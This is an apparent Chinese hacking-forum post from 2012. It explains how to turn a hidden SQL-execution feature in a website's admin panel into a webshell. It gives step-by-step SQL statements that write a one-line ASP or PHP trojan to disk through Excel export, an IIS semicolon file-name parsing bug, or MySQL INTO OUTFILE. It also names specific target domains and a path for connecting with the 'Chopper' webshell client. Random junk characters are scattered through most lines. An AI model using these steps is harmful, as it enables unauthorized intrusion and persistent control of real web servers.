好不容易进了后台,发现啥上传啊。备份啊多木有。
9 z" K5 B, L8 ?9 |. H# t" s! Zwebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
2 F3 W% y" |$ T6 |( k文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
% \* b& K9 o; ^" c; }7 |7 u& D然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:4 {1 b" W7 n+ D
1.create table cmd (a varchar(50))" A; T* R0 M- p% V- V
2.insert into cmd (a) values (‘‘)0 a# ^! |0 p. [$ O# l
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
v r7 A6 f9 [& B% y% E(把表cmd的内容导出为物理路径的一个EXCEL文件)
8 `% H$ m0 N6 ^4.drop table cmd* W8 l' h5 u4 @0 W" _# N' N9 s3 W
利用IIS的BUG成功拿到了WEBSHELL。* f+ D( R- o) o
+ b$ j# T8 K& B, r/ W9 U5 g2 `4 s8 F直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话# `9 V# E/ X" p. O+ e
1 G! h t4 _" a" Y5 M% @2 A) L
SQL语句意思解释:
" j" ^1 b1 B6 Q$ [; N& ~: D0 B8 |2 y 第一句
; j" K0 P- F2 l* ^: g 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为506 x3 _3 R! _1 q+ b
: L8 }. H1 v8 e# r# w
第二句! y5 D z& i0 I& g& [. |
在表cmd的a字段插入一句话木马
5 u5 a1 R* L* x4 q 第三句* o& D* y- h# q( ?
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件3 I; f7 P$ _4 h8 {9 C# w
. v7 {/ P+ B4 Q2 A
第四句" c6 l9 |% t% I" D2 \/ E
删除建立的cmd表; Y% r* z( t. h. \7 V% k
2 i0 D& S6 p4 h! u' y! Z* X4 Z8 W+ J
以下内容为测试:" ]# z Z0 W; \" q y0 U8 e
Access利用后台SQL执行命令功能导出WebShell:
) q% n' o* b a, E 这个更简单:
5 {8 D& f& a! D/ f9 `% r [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]/ C+ s6 [* m9 _" g* y
或者
! Y! o+ s! @. T) j' M) w [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]* {5 [! I- a/ z; y
; K. z" J; D( t) H6 ? 后台有执行SQL语句功能(vote为已知表段)
& k# p# R# X8 L1 I4 r7 Q1 ^5 C 希望对大家有所帮助拿shell的又一个思路9 u* M7 K7 q G* w, [1 o
|
发表于 2012-9-13 17:53:58
收藏
支持
反对